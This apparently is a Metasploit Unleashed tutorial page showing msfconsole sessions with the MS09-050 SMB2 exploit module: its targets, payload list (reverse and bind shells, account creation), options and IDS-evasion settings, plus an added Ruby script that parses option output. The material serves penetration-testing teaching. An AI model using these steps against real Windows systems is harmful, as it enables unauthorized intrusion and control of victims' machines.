Using Exploits

From Metasploit Unleashed



Selecting an exploit in Metasploit adds the 'exploit' and 'check' commands to msfconsole.

msf > use  exploit/windows/smb/ms09_050_smb2_negotiate_func_index
msf exploit(ms09_050_smb2_negotiate_func_index) > help
...snip...
Exploit Commands
================

    Command       Description
    -------       -----------
    check         Check to see if a target is vulnerable
    exploit       Launch an exploit attempt
    rcheck        Reloads the module and checks if the target is vulnerable
    rexploit      Reloads the module and launches an exploit attempt

msf exploit(ms09_050_smb2_negotiate_func_index) >


Show

Using an exploit also adds more options to the 'show' command.

Targets

msf exploit(ms09_050_smb2_negotiate_func_index) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   Windows Vista SP1/SP2 and Server 2008 (x86)



Payloads

msf exploit(ms09_050_smb2_negotiate_func_index) > show payloads

Compatible Payloads
===================

   Name                              Disclosure Date  Rank    Description
   ----                              ---------------  ----    -----------
   generic/custom                                     normal  Custom Payload
   generic/debug_trap                                 normal  Generic x86 Debug Trap
   generic/shell_bind_tcp                             normal  Generic Command Shell, Bind TCP Inline
   generic/shell_reverse_tcp                          normal  Generic Command Shell, Reverse TCP Inline
   generic/tight_loop                                 normal  Generic x86 Tight Loop
   windows/adduser                                    normal  Windows Execute net user /ADD
...snip...


Options

msf exploit(ms09_050_smb2_negotiate_func_index) > show options

Module options (exploit/windows/smb/ms09_050_smb2_negotiate_func_index):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   RHOST                   yes       The target address
   RPORT  445              yes       The target port
   WAIT   180              yes       The number of seconds to wait for the attack to complete.


Exploit target:

   Id  Name
   --  ----
   0   Windows Vista SP1/SP2 and Server 2008 (x86)



Advanced

msf exploit(ms09_050_smb2_negotiate_func_index) > show advanced

Module advanced options:

   Name           : CHOST
   Current Setting:
   Description    : The local client address

   Name           : CPORT
   Current Setting:
   Description    : The local client port
...snip...


Evasion

msf exploit(ms09_050_smb2_negotiate_func_index) > show evasion

Module evasion options:

   Name           : SMB::obscure_trans_pipe_level
   Current Setting: 0
   Description    : Obscure PIPE string in TransNamedPipe (level 0-3)

   Name           : SMB::pad_data_level
   Current Setting: 0
   Description    : Place extra padding between headers and data (level 0-3)

   Name           : SMB::pad_file_level
   Current Setting: 0
   Description    : Obscure path names used in open/create (level 0-3)
...snip...
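As an added example (not code from Metasploit Unleashed or the Framework itself), the Ruby script below parses the two layouts shown above, the 'show options' table and the Name/Current Setting/Description blocks printed by 'show advanced' and 'show evasion', and reports which required options are still unset. The sample output strings are constructed from the sessions on this page; msfconsole refuses to run 'check' or 'exploit' while a required option such as RHOST is empty.

```ruby
# Added example, not from Metasploit Unleashed: parse the two layouts msfconsole
# uses for module settings and report required options that are still unset,
# which "check" and "exploit" validate before doing anything else.

# Constructed sample: the "show options" table as shown on this page.
SHOW_OPTIONS = <<~TXT
  Module options (exploit/windows/smb/ms09_050_smb2_negotiate_func_index):

     Name   Current Setting  Required  Description
     ----   ---------------  --------  -----------
     RHOST                   yes       The target address
     RPORT  445              yes       The target port
     WAIT   180              yes       The number of seconds to wait for the attack to complete.
TXT

# Constructed sample: the block layout of "show advanced" / "show evasion".
SHOW_EVASION = <<~TXT
  Name           : SMB::obscure_trans_pipe_level
  Current Setting: 0
  Description    : Obscure PIPE string in TransNamedPipe (level 0-3)

  Name           : SMB::pad_data_level
  Current Setting: 0
  Description    : Place extra padding between headers and data (level 0-3)
TXT

# Fixed-width table: column offsets come from the dash row, so an empty
# "Current Setting" cell (RHOST above) parses as "" instead of eating "yes".
def parse_option_table(text)
  lines = text.lines.map(&:chomp)
  dash_idx = lines.index { |l| l.match?(/\A\s*-+(\s+-+)+\s*\z/) }
  return [] unless dash_idx
  starts = lines[dash_idx].enum_for(:scan, /-+/).map { Regexp.last_match.begin(0) }
  cells = ->(row) { starts.each_with_index.map { |s, i| row[s...(starts[i + 1] || row.length)].to_s.strip } }
  names = cells.call(lines[dash_idx - 1])
  lines[(dash_idx + 1)..].take_while { |l| !l.strip.empty? }.map { |row| names.zip(cells.call(row)).to_h }
end

# Block layout: "Key: value" lines, one block per option, separated by blank lines.
def parse_option_blocks(text)
  text.split(/\n\s*\n/).map do |blk|
    fields = blk.scan(/^\s*([A-Za-z ]+?)\s*:\s?(.*)$/).to_h { |k, v| [k, v.strip] }
    fields.key?('Name') ? fields : nil
  end.compact
end

# Required=yes options with no value (RHOST in the sample above).
def missing_required(options)
  options.select { |o| o['Required'] == 'yes' && o['Current Setting'].empty? }.map { |o| o['Name'] }
end
```

Running `missing_required(parse_option_table(SHOW_OPTIONS))` returns `["RHOST"]`, the one option that must be set before 'check' can run against the sample.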

